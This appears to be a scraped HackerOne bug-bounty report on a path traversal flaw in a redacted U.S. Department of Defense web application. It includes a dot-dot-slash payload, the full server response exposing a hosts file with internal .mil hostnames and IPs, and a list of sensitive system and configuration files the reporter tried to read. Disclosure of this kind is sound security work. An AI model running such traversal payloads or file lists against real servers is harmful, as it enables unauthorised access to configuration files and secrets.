Lucene search
R0pzH1:1212746HistoryMay 29, 2021 - 8:21 p.m.
U.S. Dept Of Defense: Path traversal on [███]
2021-05-2920:21:21
r0pz
hackerone.com
5
path traversal vulnerability
u.s. department of defense
arbitrary files
dot-dot-slash
web application
handler
parameter
configuration file
http
html.
Summary:
The web application hosted on the “███████” domain is affected by a path traversal vulnerability that could permit to an attacker to include arbirtary files that are outside of the restricted directory.
Description:
The affected handler is the “█████”.
This handler receives, through the “█████” parameter, an input from the user to construct a pathname that is intended to identify a file, but the web app does not properly neutralize “dot-dot-slash (…/)” within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory as showed in the following example in which the █████████████/hosts" configuration file is included:
Example of payload:
https://█████████████████████████
<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>███████/████████ █████ Page</title>
<link rev="made" href="mailto:webmaster%40████████████.██████.mil">
<meta name="keywords" content="█████████ ██████████ █████████. ███████">
<meta name="description" content="The U.S ███████'s ███████. █████.">
<link rel="stylesheet" type="text/css" href="/███████/stylesheets/brainjar_menus_compressed.css"media="all">
<link rel="stylesheet" type="text/css" href="/███/stylesheets/█████compressed.css"media="all">
<link rel="stylesheet" type="text/css" href="/███/stylesheets/█████████animator.css"media="all">
<script src="/████/javascripts/vert_brain_jar_menu.js" type="text/JavaScript"></script>
<script src="/██████/javascripts/jsClockGMT.js" type="text/javascript"></script>
<script src="/██████████/javascripts/popUp2.js" type="text/JavaScript"></script>
<script src="/██████████/javascripts/highlight.js" type="text/JavaScript"></script>
</head>
<body onload="jsClockGMT()" expires="+10m">
<table border="0" width="800">
<tr>
<th width="150px"><font color="white">.</font></th>
<th><div><a href="/privacy.html" title="Link to DoD Privacy Policy.">Privacy Policy</a></div></th>
<th><div><a href="/████████disclaimer.html" title="Link to disclaimer ██████████.">Disclaimer</a></div></th>
<th><font size="-2"><h1> ██████ ██████ Page </h1></font></th>
<th><div><a href="/████</A></DIV></th> </TR> </TABLE> <TR><TD colspan="><div> NOTE: this page is short lived (10 m). Please <b>DO NOT</b> bookmark it or save it to Favorites; instead, bookmark <a href="http://███/███████.html" target="_top" title="Link to ████home.html">http://████/████.html</a> thank you.</div></td></tr>
<table border="1" width="600">
<tr>
<th valign="top">
<center><b>██████████</b></center>
<div>
<table border="0">
<tr><th>
<div>
<a href title="Button linking to All" target="_top">All</a>
</div>
</th><th>
<div>
<a href="http://███████/██████.html" title="Button linking to Active" target="_top">Active</a>
</div>
</th><th>
<div>
<a href="/████████/██████████change_year.cgi?STYLE=tables" title="Button linking to Year" target="_top">Year</a>
</div>
</th></tr>
</table>
</div>
<br><b><a href>
<div> </div>
</td></tr>
</table>
<br><b><a href>
<div> </div>
</td></tr>
</table>
<br><b><a href>
<div> </div>
</td></tr>
</table>
<br><b><a href>
<div> <tr><td><a href>
<img src="/████████/icons/ball.green.jpg" height="15" width="15" alt="green ball icon"><font size="-1">99W.INVEST</font></a></td><tr><td><a href target="_top" title="Link to new storm: basin is WPAC storm is 90W.INVEST">
<img src="/████████/icons/ball.green.jpg" height="15" width="15" alt="green ball icon"><font size="-1">90W.INVEST</font></a></td> </div>
</td></tr>
</table>
<br><b><a href>
<div> </div>
</td></tr>
</table>
<br><b><a href>
<div> <tr><td><a href><font size="-1">93S.INVEST</font></a></td> </div>
</td></tr>
</table>
</th>
<th valign="top" width="89%" align="left">
<table>
<tr><td>
<table border="1">
<tr><td>
<div>
<div> </div><table><tr><td>
<div>
<a href title="Button linking to Latest" target="_top">Latest</a>
</div>
</td><td>
<div>
<a href title="Button linking to Previous" target="_top">Previous</a>
</div>
</td></tr></table> </div>
</td>
<td>
<div>
<div> </div><table><tr><td></td><td>
<div>
<a href title="Button linking to Full" target="_top">Full</a>
</div>
</td></tr></table> </div>
</td>
<td>
<div>
<div> </div><table><tr><td>
<div>
<a href title="Button linking to Pass_Mosaic" target="_top">Pass_Mosaic</a>
</div>
</td><td>
<div>
<a>Mosaic</a>
</div>
</td><td>
<div>
<a>Animate</a>
</div>
</td></tr></table> </div>
</td>
<td>
<div>
<div></div><table><tr><td>
<div>
<a href title="Button linking to Text" target="_top">Text</a>
</div>
</td><td></td><td>
<div>
<a href="/a█████f_web/index1.html" title="Button linking to A███F" target="_top">A████F</a>
</div>
</td></tr></table> </div>
</td>
<td>
<div>
<div>
<a>TrackImage</a>
</div>
</div>
</td>
<td>
<div>
<div>
<a>WindVectors</a>
<div></div>
</div>
<div>
</div>
<div>
</div>
</td>
</td>
<td>
<div>
<div>
<a>Winds</a>
<div></div>
</div>
<div>
</div>
</div>
</td>
<td>
<div>
</div>
</td>
</tr>
</table>
<table border="3">
<tr><th>Environment</th><td valign="middle" width="400">
<div>
<div> </div>
<div>
<a href title="Button linking to Total Precipital Water" target="_top">TPW</a>
</div>
<div> </div>
<div>
<a href title="Button linking to Total Precipital Water and NAVGEM TPW" target="_top">TPW+NAVGEM_TPW</a>
</div>
<div> </div>
<div>
<a href title="Button linking to Total Precipital Water and NAVGEM 850mb winds" target="_top">TPW+NAVGEM_850_Winds</a>
</div>
</div>
</td><td> <div>
<div> </div>
<div>
<a href title="Button linking to Wind_Shear" target="_top">Wind_Shear</a>
</div>
</div>
</td><td> <div>
<div> </div>
<div>
<a href="http://█████████/coamps-web/web/███" title="Button linking to COAMPS_██████" target="_top">COAMPS_██████████</a>
</div>
</div>
</td>
</tr>
</table>
<table>
<tr><td>
</td><td>
<div>
<table border="3">
<tr>
<th>Sensor</th><th>% Cov</th><th>VIS</th><th>IR</th><th>IR-BD</th><th>Multi<br>Sens.</th><th>85GHz<br>H</th><th>85GHz<br>weak</th><th>85GHz<br>PCT</th><th>Color</th><th>Rain</th><th>Wind</th><th>37GHz<br>Color</th><th>37GHz<br>V</th><th>37GHz<br>H</th><th>SSM/I<br>Vapor</th>
</tr>
<tr>
<th>SSMI</th><th> <font color="#FF0000"><font size="+1"><b></b></font></font></th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
</tr>
<tr>
<th>SSMIS</th><th> <font color="#FF0000"><font size="+1"><b></b></font></font></th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
</tr>
<tr>
<th>GMI</th><th> <font color="#FF0000"><font size="+1"><b></b></font></font></th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
</tr>
<tr>
<th>AMSR2</th><th> <font color="#FF0000"><font size="+1"><b></b></font></font></th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
</tr>
<tr>
<th>AMSUB</th><th> <font color="#FF0000"><font size="+1"><b></b></font></font></th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
<th> </th>
</tr>
</table>
</div>
</td><td>
<div>
<table border="3">
<tr>
<th></th><th>VIS</th><th>IR</th><th>Vapor</th></tr>
<tr>
<th> GAC: </th> <th> </th><th> </th><th> </th>
</tr>
<tr>
<th> GEO: </th> <th> </th><th> </th><th> </th>
</tr>
<tr>
<th> MODIS: </th> <th>
<a><img src="/icons/square_red_sm.jpg" title="red icon, product greater than 12 hours old." alt="red icon, product greater than 12 hours old." height="15" width="15"></a>
<div></div>
<div>
<a href target="_top">1_Km</a>
</div>
</th><th>
<a><img src="/icons/square_green_sm.jpg" title="green icon, product less than 6 hours old." alt="green icon, product less than 6 hours old." height="15" width="15"></a>
<div></div>
<div>
<a href target="_top">1_Km</a>
</div>
</th><th>
<a><img src="/icons/square_green_sm.jpg" title="green icon, product less than 6 hours old." alt="green icon, product less than 6 hours old." height="15" width="15"></a>
<div></div>
<div>
<a href target="_top">1_Km</a>
</div>
</th>
</tr>
<th> VIIRS: </th> <th> </th><th> </th><th>
<a><img src="/icons/square_red_sm.jpg" title="red icon, product greater than 12 hours old." alt="red icon, product greater than 12 hours old." height="15" width="15"></a>
<div></div>
<div>
<a href target="_top">1_Km</a>
</div>
</th>
</tr>
<tr>
<tr>
<th> OLS: </th> <th> </th><th> </th><th> </th>
</tr>
</table>
</div>
</td></tr>
</table>
</td></tr>
<tr><td>
<table border="0"><tr><th><table border="0"><tr><th>90W.INVEST, WARN, 29 MAY 2021 0330Z </th> <th align="Center"><FORM NAME="clockFormGMT" ACTION="POST"><div><INPUT TYPE="text" NAME="digits" SIZE=8 VALUE="Loading"><a href title="Link to Naval Observatory's Chart converting local time to Universal Time Coordinated">U███ (Z)</a></div></FORM></th></tr></table></th><th>
<div>
<div>Tutorials: </div>
<div>
<a href title="Button linking to Overview">Overview</a>
</div>
<div>
<a href title="Link to COMET training">COMET</a>
</div>
</div>
</th></tr>
<tr><th colspan="2"><center>
<table border="0">
<tr>
<th><img src="/icons/square_red_sm.jpg"</th><th valign="middle" width="400"> | ../../../../../../../../../../../../../../..███████████/hosts | </th><th><img src="/icons/square_red_sm.jpg" title="█████████." alt="████."></th></tr>
</table>
</center></th></tr>
</table>
<div><br>127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
<br>::1 localhost localhost.localdomain localhost6 localhost6.localdomain6
<br>
<br>
<br>199.9.2.125 lanaidev lanaidev.███████████████.███.mil
<br>
<br>199.9.2.5 commvault-cs commvault-cs.██████.█████████.mil
</div>
</td></tr>
<tr><td>
<table><tr><td>
<center> <div>
<table width="620" border="0">
<tr><td>
<div>
<a href="/█████.html" title="Button linking to ██████████" target="_top">██████████</a>
</div>
<div>
<a href title="Button linking to ███" target="_top">█████</a>
</div>
<div>
<a href="/██████████-bin/█████████.cgi" title="Button linking to █████████" target="_top">██████████</a>
</div>
<div>
<a href="/training-bin/training.cgi" title="Button linking to Training" target="_top">Training</a>
</div>
<div>
<a href title="Button linking to ████" target="_top">███████</a>
</div>
</td></tr>
</table>
</div>
</center>
</td></tr>
<tr><td>
<p><center><img src="/███████/images/hbar.gif" title="horizontal bar" alt="horizontal bar" width="645" height="3"></center>
<div>
<table width="100%">
<tr><td>
<center>
<a href="http://███████" target="_top" title="Link to ███████ █████'s home page."><strong>███ Home Page</strong></a> |
<a href="http://███████/search.html" target="_top" title="Link to ██████ █████████'s search page."><strong>Search</strong></a>
</center>
</td></tr>
</table>
<br>
<table width="100%">
<tr> <td>
<em>Page Generated: Sat May 29 20:10:30 2021 GMT<█████████m>
<br><em>TcPage Ver: 4.60.05w (04/23/2021)<██████████m>
<br><em>Approved for public release by: Superintendent<█████████m>
<br><a href title="Send email to the █████<█████m></A> <br><A HREF=" title="Send email to ███ █████████ webmaster."><em>Webmaster<█████m></a>
</td>
<td align="right" valign="top">
</td></tr>
</table>
</div>
</td></tr>
</table>
</td></tr>
</table>
</th>
</tr>
</table>
</body>
<head>
<meta http-equiv="Expires" content="+10m">
</head>
</html>
Several tests have been done, in several files, some of them are:
/proc/self████nviron
/proc/self/status
/proc/meminfo
/proc/cpuinfo
/proc/partitions
████████████/hosts
████████████████/php.ini
█████████████████/rpc
███████████/my.cnf
█████████████/fstab
█████████████/group
███████████████/nsswi██████h.conf
███████████████/updatedb.conf
██████████/logrotate.d/httpd
/usr/bin/curl
Impact
It may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files.
System Host(s)
██████████
Affected Product(s) and Version(s)
CVE Numbers
Steps to Reproduce
- It’s possible to insert a malicious string as the “████” parameter of the following handler to access files that are outside of the restricted directory.